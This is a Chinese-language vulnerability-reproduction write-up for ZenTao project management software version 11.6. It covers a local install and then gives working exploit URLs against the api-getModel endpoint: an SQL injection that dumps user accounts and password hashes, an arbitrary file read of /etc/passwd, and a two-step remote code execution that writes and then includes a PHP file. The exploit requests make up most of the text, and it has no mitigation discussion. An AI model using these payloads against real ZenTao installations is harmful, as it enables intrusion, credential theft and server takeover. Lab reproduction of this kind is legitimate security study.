一、安装禅道
1、下载禅道11.6
wget https://www.zentao.net/dl/zentao/11.6/ZenTaoPMS.11.6.stable.zbox_64.tar.gz`
2、解压到opt目录下
sudo tar -zxvf ZenTaoPMS.11.6.stable.zbox_64.tar.gz -C /opt
3、开启Apache和Mysql
/opt/zbox/zbox start
4、浏览器访问禅道登录页面
http://127.0.0.1/
查看版本信息
http://127.0.0.1/zentao/index.php?mode=getconfig
5、创建新用户
admin/123456登录
创建新用户test/CD87691043cs并登录
以上,禅道11.6已经安装好。
二、漏洞复现
1、SQL注入
访问下面网址,可以看到用户信息
http://127.0.0.1/zentao/api-getModel-api-sql-sql=select+account,password+from+zt_user
2、文件读取
访问下面网址,可以看到指定文件
http://127.0.0.1/zentao/api-getModel-file-parseCSV-fileName=/etc/passwd
3、RCE
POST请求包发送数据
http://192.168.59.128/zentao/api-getModel-editor-save-filePath=/tmp/1111
fileContent=<?php phpinfo()?>
(放在tmp下是因为其他目录可能有权限限制,不一定可以写进去)
查看文件1111已经写入到tmp下
访问1111文件
POST发送请求包
http://192.168.59.128/zentao/api-getModel-api-getMethod-filePath=/tmp/1111
fileContent=<?php phpinfo()?>
没有成功,查看源代码,发现需要给物理路径加上一层才可以。
http://192.168.59.128/zentao/api-getModel-api-getMethod-filePath=/tmp/1111/1
fileContent=<?php phpinfo()?>